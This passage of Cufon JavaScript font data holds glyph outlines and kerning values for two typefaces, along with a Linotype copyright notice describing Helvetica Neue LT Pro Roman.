u0119":-5,"\u0105":-4,"\u00d3":-5,"\u00f3":-5,"z":7,"x":10,"s":-2,"q":-5,"g":-5,"d":-5,"c":-5,"Z":7,"Y":33,"X":6,"V":12,"S":11,"Q":-5,"M":-4,"G":-5}},"\u2014":{"d":"355,-64r-336,0r0,-51r336,0r0,51","w":374,"k":{"\u00ea":-5,"\u00c6":-5,"\u00b9":-4,"o":-5,"e":-5,"a":-4,"W":6,"T":33,"O":-5,"C":-5,"\u0106":-5,"\u0119":-5,"\u0105":-4,"\u00d3":-5,"\u00f3":-5,"z":7,"x":10,"s":-2,"q":-5,"g":-5,"d":-5,"c":-5,"Z":7,"Y":33,"X":6,"V":12,"S":11,"Q":-5,"M":-4,"G":-5}},"\u201c":{"d":"158,-231r-19,88r-63,0r51,-96xm86,-231r-19,88r-63,0r51,-96","w":161,"k":{"\u00ea":17,"\u00c6":5,"\u00a5":24,"\u00b9":19,"o":17,"e":17,"a":19,"W":-17,"T":-15,"O":5,"C":5,"A":24,"\u0106":5,"\u0119":17,"\u0105":19,"\u0104":24,"\u00d3":5,"\u2026":24,"\u00f3":17,"y":-7,"w":-7,"v":-7,"u":9,"t":-5,"s":12,"r":9,"q":19,"p":9,"n":9,"m":9,"j":-1,"i":-1,"g":12,"f":-2,"d":17,"c":19,"Z":-11,"Y":-17,"X":-11,"V":-17,"S":-6,"Q":5,"M":7,"G":5}},"\u201d":{"d":"158,-240r-52,97r-30,-8r19,-89r63,0xm86,-240r-52,97r-30,-8r19,-89r63,0","w":161},"\u2018":{"d":"86,-231r-19,88r-63,0r51,-96","w":89,"k":{"\u00ea":17,"\u00c6":5,"\u00a5":24,"\u00b9":19,"o":17,"e":17,"a":19,"W":-17,"T":-15,"O":5,"C":5,"A":24,"\u0106":5,"\u0119":17,"\u0105":19,"\u0104":24,"\u00d3":5,"\u2026":24,"\u00f3":17,"y":-7,"w":-7,"v":-7,"u":9,"t":-5,"s":12,"r":9,"q":19,"p":9,"n":9,"m":9,"j":-1,"i":-1,"g":12,"f":-2,"d":17,"c":19,"Z":-11,"Y":-17,"X":-11,"V":-17,"S":-6,"Q":5,"M":7,"G":5}},"\u2019":{"d":"86,-240r-52,97r-30,-8r19,-89r63,0","w":89,"k":{"o":46,"T":-12,"O":22,"\u00d3":22,"\u00f3":46,"v":18,"t":15,"s":42,"r":32,"m":32,"d":48,"V":-14,"S":8,"M":14}},"\u00ff":{"d":"177,-178r-48,188v-8,59,-61,62,-121,47r13,-45v20,8,49,9,51,-12r-32,0r-42,-177r71,-5r19,104r20,-100r69,0xm127,-260v15,0,30,12,30,26v0,15,-15,27,-30,27v-16,0,-30,-12,-30,-26v0,-15,15,-27,30,-27xm52,-260v15,0,30,12,30,26v0,15,-15,27,-30,27v-16,0,-31,-11,-31,-26v-1,-15,16,-27,31,-27","w":172},"\u00b7":{"d":"14,-120v1,-35,75,-36,76,0v-1,35,-75,35,-76,0","w":104},"\u2219":{"d":"14,-120v1,-35,75,-36,76,0v-1,35,-75,35,-76,0","w":104},"\u201e":{"d":"149,-50r-51,97r-31,-9r19,-88r63,0xm77,-50r-52,97r-30,-9r19,-88r63,0","w":146},"\u00c2":{"d":"211,0r-80,0r-9,-53r-39,0r-9,53r-80,0r59,-240r100,0xm114,-106r-11,-73r-12,73r23,0xm158,-287r-16,19r-40,-23r-39,23r-16,-19r55,-42","w":205},"\u00c1":{"d":"211,0r-80,0r-9,-53r-39,0r-9,53r-80,0r59,-240r100,0xm114,-106r-11,-73r-12,73r23,0xm152,-297r-54,36r-20,-16r41,-50","w":205},"\u00cb":{"d":"170,0r-158,0r0,-240r158,0r0,53r-79,5r0,33r61,0r0,52r-61,0r0,36r79,5r0,56xm127,-320v16,0,31,11,30,26v0,15,-15,27,-30,27v-16,0,-30,-11,-30,-26v0,-16,15,-27,30,-27xm51,-320v16,0,30,11,30,26v0,15,-14,27,-29,27v-16,0,-31,-11,-31,-26v0,-15,15,-27,30,-27","w":174},"\u00c8":{"d":"170,0r-158,0r0,-240r158,0r0,53r-79,5r0,33r61,0r0,52r-61,0r0,36r79,5r0,56xm119,-278r-20,17r-54,-36r33,-31","w":174},"\u00cd":{"d":"91,0r-79,0r0,-240r79,0r0,240xm102,-297r-53,36r-20,-16r40,-50","w":103},"\u00ce":{"d":"91,0r-79,0r0,-240r79,0r0,240xm107,-287r-16,19r-39,-23r-39,23r-17,-19r56,-42","w":103},"\u00cf":{"d":"91,0r-79,0r0,-240r79,0r0,240xm89,-320v16,0,31,11,31,26v0,15,-15,27,-30,27v-16,0,-31,-11,-31,-26v0,-15,15,-27,30,-27xm14,-320v16,0,31,11,30,26v0,15,-15,27,-30,27v-16,0,-31,-11,-31,-26v-1,-15,16,-27,31,-27","w":103},"\u00cc":{"d":"91,0r-79,0r0,-240r79,0r0,240xm73,-278r-20,17r-54,-36r33,-31","w":103},"\u00d3":{"d":"105,-244v67,0,100,52,100,124v0,72,-32,124,-100,124v-67,0,-100,-51,-100,-122v0,-74,31,-125,100,-126xm125,-120v0,-45,-7,-68,-20,-68v-13,0,-19,22,-19,67v0,46,6,69,19,69v13,0,20,-23,20,-68xm144,-297r-53,36r-20,-16r41,-50","w":210,"k":{"\u00a5":4,"\u00b9":4,"a":4,"W":-1,"T":8,"A":4,"\u0105":4,"\u0104":4,"\u00c1":4,"\u00c2":4,"\u00ff":-7,"\u2019":-5,"\u201d":-5,"\u2014":-5,"\u2013":-5,"\u00c3":4,"\u00c0":4,"\u2026":15,"\u00e7":-1,"\u00e5":4,"\u00e3":4,"\u00e4":4,"\u00e2":4,"\u00e0":4,"\u00e1":4,"\u00c5":4,"\u00c4":4,"z":-4,"y":-7,"x":2,"w":-7,"v":-7,"t":-5,"s":-1,"q":-1,"g":-2,"f":-5,"d":-1,"c":-1,"Z":7,"Y":13,"X":8,"V":4,"S":-1,"?":5,";":-7,":":-7,"\/":14,".":15,"-":-5,",":15}},"\u00d4":{"d":"105,-244v67,0,100,52,100,124v0,72,-32,124,-100,124v-67,0,-100,-51,-100,-122v0,-74,31,-125,100,-126xm125,-120v0,-45,-7,-68,-20,-68v-13,0,-19,22,-19,67v0,46,6,69,19,69v13,0,20,-23,20,-68xm160,-287r-16,19r-39,-23r-39,23r-17,-19r56,-42","w":210},"\u00d2":{"d":"105,-244v67,0,100,52,100,124v0,72,-32,124,-100,124v-67,0,-100,-51,-100,-122v0,-74,31,-125,100,-126xm125,-120v0,-45,-7,-68,-20,-68v-13,0,-19,22,-19,67v0,46,6,69,19,69v13,0,20,-23,20,-68xm136,-278r-20,17r-54,-36r33,-31","w":210},"\u00da":{"d":"92,-62v5,15,29,14,29,-9r0,-169r79,0r0,172v0,50,-40,74,-94,74v-54,0,-93,-24,-94,-74r0,-172r79,0xm147,-297r-53,36r-20,-16r41,-50","w":211},"\u00db":{"d":"92,-62v5,15,29,14,29,-9r0,-169r79,0r0,172v0,50,-40,74,-94,74v-54,0,-93,-24,-94,-74r0,-172r79,0xm161,-287r-16,19r-39,-23r-39,23r-17,-19r56,-42","w":211},"\u00d9":{"d":"92,-62v5,15,29,14,29,-9r0,-169r79,0r0,172v0,50,-40,74,-94,74v-54,0,-93,-24,-94,-74r0,-172r79,0xm135,-278r-20,17r-53,-36r32,-31","w":211},"\u0131":{"d":"80,0r-68,0r0,-177r68,-5r0,182","w":91},"\u00b8":{"d":"5,19v30,-12,73,-12,73,20v0,21,-22,36,-65,46r0,-20v20,-3,31,-10,31,-19v0,-13,-21,-10,-34,-5","w":82},"\u0160":{"d":"20,-116v-45,-51,-3,-128,72,-128v23,0,50,6,73,12r-16,55v-20,-8,-36,-12,-50,-12v-28,0,-30,19,-7,28v37,15,82,31,81,81v-1,80,-90,102,-170,73r15,-57v20,8,38,12,52,12v23,2,33,-15,19,-25v-15,-10,-59,-27,-69,-39xm147,-305r-56,43r-55,-43r17,-19r38,23r40,-23","w":174},"\u0161":{"d":"136,-126v-18,-4,-56,-15,-66,-2v4,10,30,12,41,16v26,9,39,26,39,52v2,70,-86,73,-148,57r12,-50v19,9,93,5,50,-12v-37,-3,-61,-23,-60,-56v1,-64,81,-70,144,-54xm138,-245r-55,43r-56,-43r17,-18r39,23r39,-23","w":154},"\u017d":{"d":"167,0r-166,0r0,-33r69,-148r-69,-6r0,-53r165,0r0,37r-65,142r66,6r0,55xm141,-305r-55,43r-56,-43r17,-19r39,23r39,-23","w":167},"\u017e":{"d":"146,-151r-57,101r56,4r0,46r-145,0r0,-27r55,-99r-51,-4r0,-48r142,0r0,27xm128,-245r-55,43r-56,-43r17,-18r39,23r39,-23","w":147},"\u00dd":{"d":"205,-240r-69,156r0,84r-79,0r0,-84r-64,-156r85,0r20,79r22,-79r85,0xm145,-297r-54,36r-19,-16r40,-50","w":197},"\u00ad":{"d":"148,-47r-144,0r0,-48r144,0r0,48","w":151},"\u2212":{"d":"148,-47r-144,0r0,-48r144,0r0,48","w":151},"\u00a4":{"d":"87,-202v20,-17,77,-18,96,0r21,-21r28,28r-21,21v20,25,20,74,0,97r21,22r-29,28r-21,-22v-20,18,-75,19,-96,0r-21,21r-28,-27r21,-22v-19,-34,-18,-65,0,-97r-20,-20r28,-29xm134,-88v20,-1,37,-15,37,-37v0,-22,-16,-37,-37,-38v-48,0,-43,75,0,75","w":270},"\u0179":{"d":"167,0r-166,0r0,-33r69,-148r-69,-6r0,-53r165,0r0,37r-65,142r66,6r0,55xm128,-297r-54,36r-19,-16r40,-50","w":167},"\u017a":{"d":"146,-151r-57,101r56,4r0,46r-145,0r0,-27r55,-99r-51,-4r0,-48r142,0r0,27xm116,-237r-54,36r-19,-16r40,-50","w":147},"\u017c":{"d":"146,-151r-57,101r56,4r0,46r-145,0r0,-27r55,-99r-51,-4r0,-48r142,0r0,27xm43,-218v1,-35,71,-35,72,0v0,34,-72,35,-72,0","w":147},"\u017b":{"d":"167,0r-166,0r0,-33r69,-148r-69,-6r0,-53r165,0r0,37r-65,142r66,6r0,55xm83,-315v18,0,36,11,36,27v-1,34,-69,33,-71,0v0,-16,18,-27,35,-27","w":167},"\u015b":{"d":"136,-126v-18,-4,-56,-15,-66,-2v4,10,30,12,41,16v26,9,39,26,39,52v2,70,-86,73,-148,57r12,-50v19,9,93,5,50,-12v-37,-3,-61,-23,-60,-56v1,-64,81,-70,144,-54xm116,-237r-54,36r-19,-16r40,-50","w":154},"\u015a":{"d":"20,-116v-45,-51,-3,-128,72,-128v23,0,50,6,73,12r-16,55v-20,-8,-36,-12,-50,-12v-28,0,-30,19,-7,28v37,15,82,31,81,81v-1,80,-90,102,-170,73r15,-57v20,8,38,12,52,12v23,2,33,-15,19,-25v-15,-10,-59,-27,-69,-39xm127,-297r-54,36r-19,-16r40,-50","w":174},"\u0104":{"d":"174,18v0,16,26,9,36,3r0,36v-29,17,-84,11,-82,-30v0,-14,5,-19,12,-27r-9,0r-9,-53r-39,0r-9,53r-80,0r59,-240r100,0r58,240v-18,-1,-37,3,-37,18xm114,-106r-11,-73r-12,73r23,0","w":205,"k":{"\u00c6":4,"\u00a5":-17,"\u00b9":-7,"o":-2,"a":-7,"W":12,"T":26,"O":4,"C":4,"A":-17,"\u0106":4,"\u0105":-7,"\u0104":-17,"\u00d9":4,"\u00db":4,"\u00da":4,"\u00d2":4,"\u00d4":4,"\u00d3":4,"\u00c1":-17,"\u00c2":-17,"\u00ff":7,"\u2019":18,"\u201d":18,"\u00d5":4,"\u00c3":-17,"\u00c0":-17,"\u2026":-13,"\u00f8":-2,"\u00d8":4,"\u2122":19,"\u00ae":12,"\u00df":-2,"\u00f5":-2,"\u00f6":-2,"\u00f4":-2,"\u00f2":-2,"\u00f3":-2,"\u00ef":-2,"\u00ee":-2,"\u00ec":-2,"\u00ed":-2,"\u00e7":-2,"\u00e5":-7,"\u00e3":-7,"\u00e4":-7,"\u00e2":-7,"\u00e0":-7,"\u00e1":-7,"\u00dc":4,"\u00d6":4,"\u00c7":4,"\u00c5":-17,"\u00c4":-17,"z":-14,"y":7,"x":-14,"w":5,"v":7,"t":1,"s":-8,"r":-2,"q":-2,"p":-2,"n":-2,"m":-2,"l":-2,"k":-2,"j":-5,"i":-2,"h":-2,"g":-12,"f":-2,"d":-4,"c":-2,"b":-2,"Z":-13,"Y":32,"X":-17,"V":17,"U":4,"S":-6,"Q":4,"M":-10,"J":-2,"G":4,"?":-5,";":-13,":":-13,"\/":-17,".":-13,",":-13,"*":19,"!":-2}},"\u0141":{"d":"135,-137r-41,13r0,64r75,4r0,56r-154,0r0,-97r-15,5r0,-50r15,-5r0,-93r79,0r0,67r41,-14r0,50","w":167,"k":{"\u00c6":7,"\u00a5":-13,"\u00b9":-7,"o":-4,"a":-7,"W":14,"T":29,"O":8,"C":7,"A":-13,"\u0106":7,"\u0105":-7,"\u0104":-13,"\u00d9":4,"\u00db":4,"\u00da":4,"\u00d2":8,"\u00d4":8,"\u00d3":8,"\u00c1":-13,"\u00c2":-13,"\u00ff":10,"\u2019":24,"\u201d":24,"\u00d5":8,"\u00c3":-13,"\u00c0":-13,"\u2026":-13,"\u00f8":-4,"\u00d8":10,"\u2122":36,"\u00ae":24,"\u00f5":-4,"\u00f6":-4,"\u00f4":-4,"\u00f2":-4,"\u00f3":-4,"\u00ef":-2,"\u00ee":-2,"\u00ec":-2,"\u00ed":-2,"\u00e7":-4,"\u00e5":-7,"\u00e3":-7,"\u00e4":-7,"\u00e2":-7,"\u00e0":-7,"\u00e1":-7,"\u00dc":4,"\u00d6":8,"\u00c7":10,"\u00c5":-13,"\u00c4":-13,"y":10,"w":10,"r":-2,"q":-4,"n":-2,"m":-2,"l":-2,"i":-2,"h":-2,"d":-4,"c":-4,"Z":-12,"Y":36,"V":22,"U":4,"S":-5,"Q":8,"M":-10,"G":10,"?":-2,";":-13,":":-13,"\/":-10,".":-13,",":-13,"*":46}},"\u0142":{"d":"98,-131r-13,4r0,127r-68,0r0,-103r-13,4r0,-43r13,-4r0,-93r68,-6r0,76r13,-5r0,43","w":102},"\u0105":{"d":"137,18v1,16,26,9,36,3r0,36v-29,17,-81,10,-81,-30v0,-19,18,-25,8,-41v-32,37,-96,16,-96,-39v0,-50,48,-70,96,-54v6,-35,-39,-26,-64,-18r-14,-46v61,-16,145,-26,145,52r0,119v-15,2,-29,5,-30,18xm100,-42r0,-35v-16,-1,-27,4,-27,19v0,13,13,19,27,16","w":179},"\u0118":{"d":"127,65v-42,11,-67,-41,-40,-65r-75,0r0,-240r158,0r0,53r-79,5r0,33r61,0r0,52r-61,0r0,36r79,5r0,56v-22,-1,-47,0,-49,18v1,16,26,9,36,3r0,36v-9,5,-18,7,-30,8","w":174},"\u0119":{"d":"118,65v-41,8,-65,-37,-42,-63v-46,-6,-71,-41,-71,-94v0,-54,28,-89,82,-89v58,0,83,48,74,115r-82,0v4,24,46,24,70,16r10,45v-15,8,-46,3,-46,23v0,16,25,9,35,3r0,36v-9,5,-18,6,-30,8xm102,-105v1,-19,-5,-32,-16,-31v-10,0,-16,10,-16,31r32,0","w":166},"\u0107":{"d":"5,-89v0,-72,55,-109,123,-85r-8,48v-27,-11,-46,2,-46,37v0,36,22,48,48,35r8,50v-71,25,-125,-9,-125,-85xm114,-237r-54,36r-19,-16r40,-50","w":128},"\u0106":{"d":"86,-119v0,56,31,80,76,60r6,54v-91,31,-163,-17,-163,-114v0,-94,69,-148,158,-116r-8,51v-46,-13,-69,12,-69,65xm139,-297r-54,36r-19,-16r40,-50","w":165,"k":{"\u00ea":2,"\u00c6":10,"\u00a5":-12,"\u00b9":-5,"e":2,"a":-5,"T":-6,"O":10,"C":10,"A":-12,"\u0106":10,"\u0119":2,"\u0105":-5,"\u0104":-12,"\u00d2":10,"\u00d4":10,"\u00d3":10,"\u00c1":-12,"\u00c2":-12,"\u00ff":5,"\u2019":-2,"\u201d":-2,"\u00d5":10,"\u00c3":-12,"\u00c0":-12,"\u2026":-13,"\u00d8":10,"\u2122":-12,"\u00ae":12,"\u00ef":-29,"\u00ee":-12,"\u00ec":-2,"\u00ed":-2,"\u00eb":2,"\u00e8":2,"\u00e9":2,"\u00e5":-5,"\u00e3":-5,"\u00e4":-5,"\u00e2":-5,"\u00e0":-5,"\u00e1":-5,"\u00d6":10,"\u00c7":10,"\u00c5":-12,"\u00c4":-12,"y":5,"r":-2,"p":-2,"n":-2,"m":-2,"l":-2,"k":-2,"j":-2,"i":-2,"h":-2,"b":-2,"Y":-7,"S":-4,"Q":10,"G":10,"?":-5,";":-13,":":-13,"\/":-15,".":-13,",":-13,"*":-6,"!":-5}},"\u0144":{"d":"79,-171v42,-23,91,-11,91,48r0,123r-67,0r0,-104v0,-20,-8,-25,-24,-21r0,125r-67,0r0,-177r67,-5r0,11xm128,-237r-54,36r-19,-16r40,-50"},"\u0143":{"d":"200,0r-83,0r-43,-143r0,143r-62,0r0,-240r83,0r42,141r0,-141r63,0r0,240xm148,-297r-54,36r-19,-16r40,-50","w":211},"\u00b9":{"d":"137,18v1,16,26,9,36,3r0,36v-29,17,-81,10,-81,-30v0,-19,18,-25,8,-41v-32,37,-96,16,-96,-39v0,-50,48,-70,96,-54v6,-35,-39,-26,-64,-18r-14,-46v61,-16,145,-26,145,52r0,119v-15,2,-29,5,-30,18xm100,-42r0,-35v-16,-1,-27,4,-27,19v0,13,13,19,27,16","w":179},"\u00a5":{"d":"174,18v0,16,26,9,36,3r0,36v-29,17,-84,11,-82,-30v0,-14,5,-19,12,-27r-9,0r-9,-53r-39,0r-9,53r-80,0r59,-240r100,0r58,240v-18,-1,-37,3,-37,18xm114,-106r-11,-73r-12,73r23,0","w":205,"k":{"\u00c6":4,"\u00a5":-17,"\u00b9":-7,"o":-2,"a":-7,"W":12,"T":26,"O":4,"C":4,"A":-17,"\u0106":4,"\u0105":-7,"\u0104":-17,"\u00d9":4,"\u00db":4,"\u00da":4,"\u00d2":4,"\u00d4":4,"\u00d3":4,"\u00c1":-17,"\u00c2":-17,"\u00ff":7,"\u2019":18,"\u201d":18,"\u00d5":4,"\u00c3":-17,"\u00c0":-17,"\u2026":-13,"\u00f8":-2,"\u00d8":4,"\u2122":19,"\u00ae":12,"\u00df":-2,"\u00f5":-2,"\u00f6":-2,"\u00f4":-2,"\u00f2":-2,"\u00f3":-2,"\u00ef":-2,"\u00ee":-2,"\u00ec":-2,"\u00ed":-2,"\u00e7":-2,"\u00e5":-7,"\u00e3":-7,"\u00e4":-7,"\u00e2":-7,"\u00e0":-7,"\u00e1":-7,"\u00dc":4,"\u00d6":4,"\u00c7":4,"\u00c5":-17,"\u00c4":-17,"z":-14,"y":7,"x":-14,"w":5,"v":7,"t":1,"s":-8,"r":-2,"q":-2,"p":-2,"n":-2,"m":-2,"l":-2,"k":-2,"j":-5,"i":-2,"h":-2,"g":-12,"f":-2,"d":-4,"c":-2,"b":-2,"Z":-13,"Y":32,"X":-17,"V":17,"U":4,"S":-6,"Q":4,"M":-10,"J":-2,"G":4,"?":-5,";":-13,":":-13,"\/":-17,".":-13,",":-13,"*":19,"!":-2}},"\u00e6":{"d":"5,-89v0,-72,55,-109,123,-85r-8,48v-27,-11,-46,2,-46,37v0,36,22,48,48,35r8,50v-71,25,-125,-9,-125,-85xm114,-237r-54,36r-19,-16r40,-50","w":128},"\u00c6":{"d":"86,-119v0,56,31,80,76,60r6,54v-91,31,-163,-17,-163,-114v0,-94,69,-148,158,-116r-8,51v-46,-13,-69,12,-69,65xm139,-297r-54,36r-19,-16r40,-50","w":165,"k":{"\u00ea":2,"\u00c6":10,"\u00a5":-12,"\u00b9":-5,"e":2,"a":-5,"T":-6,"O":10,"C":10,"A":-12,"\u0106":10,"\u0119":2,"\u0105":-5,"\u0104":-12,"\u00d2":10,"\u00d4":10,"\u00d3":10,"\u00c1":-12,"\u00c2":-12,"\u00ff":5,"\u2019":-2,"\u201d":-2,"\u00d5":10,"\u00c3":-12,"\u00c0":-12,"\u2026":-13,"\u00d8":10,"\u2122":-12,"\u00ae":12,"\u00ef":-29,"\u00ee":-12,"\u00ec":-2,"\u00ed":-2,"\u00eb":2,"\u00e8":2,"\u00e9":2,"\u00e5":-5,"\u00e3":-5,"\u00e4":-5,"\u00e2":-5,"\u00e0":-5,"\u00e1":-5,"\u00d6":10,"\u00c7":10,"\u00c5":-12,"\u00c4":-12,"y":5,"r":-2,"p":-2,"n":-2,"m":-2,"l":-2,"k":-2,"j":-2,"i":-2,"h":-2,"b":-2,"Y":-7,"S":-4,"Q":10,"G":10,"?":-5,";":-13,":":-13,"\/":-15,".":-13,",":-13,"*":-6,"!":-5}},"\u00ea":{"d":"118,65v-41,8,-65,-37,-42,-63v-46,-6,-71,-41,-71,-94v0,-54,28,-89,82,-89v58,0,83,48,74,115r-82,0v4,24,46,24,70,16r10,45v-15,8,-46,3,-46,23v0,16,25,9,35,3r0,36v-9,5,-18,6,-30,8xm102,-105v1,-19,-5,-32,-16,-31v-10,0,-16,10,-16,31r32,0","w":166},"\u00ca":{"d":"127,65v-42,11,-67,-41,-40,-65r-75,0r0,-240r158,0r0,53r-79,5r0,33r61,0r0,52r-61,0r0,36r79,5r0,56v-22,-1,-47,0,-49,18v1,16,26,9,36,3r0,36v-9,5,-18,7,-30,8","w":174},"\u00b3":{"d":"98,-131r-13,4r0,127r-68,0r0,-103r-13,4r0,-43r13,-4r0,-93r68,-6r0,76r13,-5r0,43","w":102},"\u00a3":{"d":"135,-137r-41,13r0,64r75,4r0,56r-154,0r0,-97r-15,5r0,-50r15,-5r0,-93r79,0r0,67r41,-14r0,50","w":167,"k":{"\u00c6":7,"\u00a5":-13,"\u00b9":-7,"o":-4,"a":-7,"W":14,"T":29,"O":8,"C":7,"A":-13,"\u0106":7,"\u0105":-7,"\u0104":-13,"\u00d9":4,"\u00db":4,"\u00da":4,"\u00d2":8,"\u00d4":8,"\u00d3":8,"\u00c1":-13,"\u00c2":-13,"\u00ff":10,"\u2019":24,"\u201d":24,"\u00d5":8,"\u00c3":-13,"\u00c0":-13,"\u2026":-13,"\u00f8":-4,"\u00d8":10,"\u2122":36,"\u00ae":24,"\u00f5":-4,"\u00f6":-4,"\u00f4":-4,"\u00f2":-4,"\u00f3":-4,"\u00ef":-2,"\u00ee":-2,"\u00ec":-2,"\u00ed":-2,"\u00e7":-4,"\u00e5":-7,"\u00e3":-7,"\u00e4":-7,"\u00e2":-7,"\u00e0":-7,"\u00e1":-7,"\u00dc":4,"\u00d6":8,"\u00c7":10,"\u00c5":-13,"\u00c4":-13,"y":10,"w":10,"r":-2,"q":-4,"n":-2,"m":-2,"l":-2,"i":-2,"h":-2,"d":-4,"c":-4,"Z":-12,"Y":36,"V":22,"U":4,"S":-5,"Q":8,"M":-10,"G":10,"?":-2,";":-13,":":-13,"\/":-10,".":-13,",":-13,"*":46}},"\u00f1":{"d":"79,-171v42,-23,91,-11,91,48r0,123r-67,0r0,-104v0,-20,-8,-25,-24,-21r0,125r-67,0r0,-177r67,-5r0,11xm128,-237r-54,36r-19,-16r40,-50"},"\u00d1":{"d":"200,0r-83,0r-43,-143r0,143r-62,0r0,-240r83,0r42,141r0,-141r63,0r0,240xm148,-297r-54,36r-19,-16r40,-50","w":211},"\u0153":{"d":"136,-126v-18,-4,-56,-15,-66,-2v4,10,30,12,41,16v26,9,39,26,39,52v2,70,-86,73,-148,57r12,-50v19,9,93,5,50,-12v-37,-3,-61,-23,-60,-56v1,-64,81,-70,144,-54xm116,-237r-54,36r-19,-16r40,-50","w":154},"\u0152":{"d":"20,-116v-45,-51,-3,-128,72,-128v23,0,50,6,73,12r-16,55v-20,-8,-36,-12,-50,-12v-28,0,-30,19,-7,28v37,15,82,31,81,81v-1,80,-90,102,-170,73r15,-57v20,8,38,12,52,12v23,2,33,-15,19,-25v-15,-10,-59,-27,-69,-39xm127,-297r-54,36r-19,-16r40,-50","w":174},"\u0178":{"d":"146,-151r-57,101r56,4r0,46r-145,0r0,-27r55,-99r-51,-4r0,-48r142,0r0,27xm116,-237r-54,36r-19,-16r40,-50","w":147},"\u00bf":{"d":"146,-151r-57,101r56,4r0,46r-145,0r0,-27r55,-99r-51,-4r0,-48r142,0r0,27xm43,-218v1,-35,71,-35,72,0v0,34,-72,35,-72,0","w":147},"\u00af":{"d":"167,0r-166,0r0,-33r69,-148r-69,-6r0,-53r165,0r0,37r-65,142r66,6r0,55xm83,-315v18,0,36,11,36,27v-1,34,-69,33,-71,0v0,-16,18,-27,35,-27","w":167},"\u00a0":{"w":72}}});


/*!
 * The following copyright notice may not be removed under any circumstances.
 * 
 * Copyright:
 * Part of the digitally encoded machine readable outline data for producing the
 * Typefaces provided is copyrighted © 2003 - 2006 Linotype GmbH, www.linotype.com.
 * All rights reserved. This software is the property of Linotype GmbH, and may not
 * be reproduced, modified, disclosed or transferred without the express written
 * approval of Linotype GmbH. Copyright © 1988, 1990, 1993 Adobe Systems
 * Incorporated. All Rights Reserved. Helvetica is a trademark of Heidelberger
 * Druckmaschinen AG, exclusively licensed through Linotype GmbH, and may be
 * registered in certain jurisdictions. This typeface is original artwork of
 * Linotype Design Studio. The design may be protected in certain jurisdictions.
 * 
 * Trademark:
 * Helvetica is a trademark of Heidelberger Druckmaschinen AG, exclusively
 * licensed through Linotype GmbH, and may be registered in certain jurisdictions.
 * 
 * Full name:
 * HelveticaNeueLTPro-Roman
 * 
 * Description:
 * Helvetica is one of the most famous and popular typefaces in the world. It
 * lends an air of lucid efficiency to any typographic message with its clean,
 * no-nonsense shapes. The original typeface was called Haas Grotesk, and was
 * designed in 1957 by Max Miedinger for the Haas'sche Schriftgiesserei (Haas Type
 * Foundry) in Switzerland. In 1960 the name was changed to Helvetica (an
 * adaptation of "Helvetia", the Latin name for Switzerland). Over the years, the
 * Helvetica family was expanded to include many different weights, but these were
 * not as well coordinated with each other as they might have been. In 1983, D.
 * Stempel AG and Linotype re-designed and digitized Neue Helvetica and updated it
 * into a cohesive font family. Today, the original Helvetica family consists of 34
 * different font weights, and the Neue Helvetica family consists of 51 font
 * weights. The Helvetica family now forms an integral part of many digital
 * printers and operating systems and has become a stylistic anchor in our visual
 * culture. It is the quintessential sans serif font, timeless and neutral, and can
 * be used for all types of communication. Helvetica World, an update to the
 * classic Helvetica design using the OpenType font format, contains the following
 * Microsoft code pages: 1252 Latin 1, 1250 Latin 2 Eastern, 1251 Cyrillic, 1253
 * Greek, 1254 Turk, 1255 Hebrew, 1256 Arabic, 1257 Windows Baltic, 1258 Windows
 * Vietnamese, as well as a mixture of box drawing element glyphs and mathematical
 * symbols & operators. In total, each weight of Helvetica World contains more than
 * 1850 different glyph characters!
 * 
 * Manufacturer:
 * Linotype GmbH
 * 
 * Designer:
 * Linotype Design Studio
 * 
 * Vendor URL:
 * http://www.linotype.com
 * 
 * License information:
 * http://www.linotype.com/license
 */
Cufon.registerFont((function(f){var b=_cufon_bridge_={p:[{"d":"70,-186r0,40r-40,0r0,-40r40,0xm30,0r0,-40r40,0r0,40r-40,0","w":100},{"d":"62,-228r0,199r57,0v23,0,87,-6,87,-101v0,-61,-23,-98,-86,-98r-58,0xm28,0r0,-257r88,0v79,0,124,40,124,122v0,86,-38,135,-124,135r-88,0xm168,-332r-37,52r-33,0r-38,-52r30,0r25,35r25,-35r28,0","w":253},{"d":"28,0r0,-257r178,0r0,29r-144,0r0,81r134,0r0,29r-134,0r0,89r145,0r0,29r-179,0xm133,-323r0,37r-32,0r0,-37r32,0","w":219},{"d":"72,-257r0,41r39,-15r7,18r-39,13r24,33r-15,11r-25,-34r-23,34r-17,-11r24,-33r-38,-13r6,-18r38,15r0,-41r19,0","w":126},{"d":"137,-234v-121,1,-120,210,0,211v120,-1,120,-210,0,-211xm14,-129v0,-70,41,-134,123,-134v82,0,123,64,123,134v0,70,-41,135,-123,135v-82,0,-123,-65,-123,-135xm76,-294r0,-20r123,0r0,20r-123,0","w":273},{"d":"181,-126r-32,0v-5,-23,-20,-37,-46,-37v-44,0,-58,35,-58,72v0,35,16,68,55,68v30,0,47,-17,51,-45r31,0v-7,44,-33,70,-77,72r-11,16v18,-9,42,2,42,24v-2,36,-49,37,-77,25r6,-16v12,7,42,8,44,-7v1,-12,-21,-13,-31,-8v-13,-13,7,-23,13,-34v-51,-4,-78,-43,-78,-95v0,-56,29,-99,88,-99v42,0,75,20,80,64","w":193},{"d":"181,-126r-32,0v-5,-23,-20,-37,-46,-37v-44,0,-58,35,-58,72v0,35,16,68,55,68v30,0,47,-17,51,-45r31,0v-7,46,-35,72,-82,72v-57,0,-87,-39,-87,-95v0,-56,29,-99,88,-99v42,0,75,20,80,64xm49,-212r37,-52r34,0r37,52r-30,0r-25,-35r-25,35r-28,0","w":193},{"d":"243,-180r-34,0v-8,-36,-36,-54,-72,-54v-61,0,-87,50,-87,104v0,59,25,107,87,107v45,0,71,-32,74,-74r35,0v-7,64,-47,103,-112,103v-80,0,-119,-59,-119,-134v0,-75,43,-135,122,-135v54,0,98,28,106,83xm125,-280r31,-52r39,0r-47,52r-23,0","w":259},{"d":"105,-195v-2,-63,-73,-53,-72,0v0,22,10,40,36,40v26,0,36,-18,36,-40xm69,-255v39,0,60,26,60,60v0,35,-21,58,-60,58v-38,0,-60,-24,-60,-58v0,-33,21,-60,60,-60","w":138},{"d":"-10,-217r0,-37r33,0r0,37r-33,0xm58,-217r0,-37r32,0r0,37r-32,0xm55,0r-30,0r0,-186r30,0r0,186","w":79},{"d":"181,-126r-32,0v-5,-23,-20,-37,-46,-37v-44,0,-58,35,-58,72v0,35,16,68,55,68v30,0,47,-17,51,-45r31,0v-7,46,-35,72,-82,72v-57,0,-87,-39,-87,-95v0,-56,29,-99,88,-99v42,0,75,20,80,64xm87,-212r31,-52r40,0r-47,52r-24,0","w":193},{"d":"55,-257r0,96v10,-21,34,-29,60,-29v57,0,86,44,86,97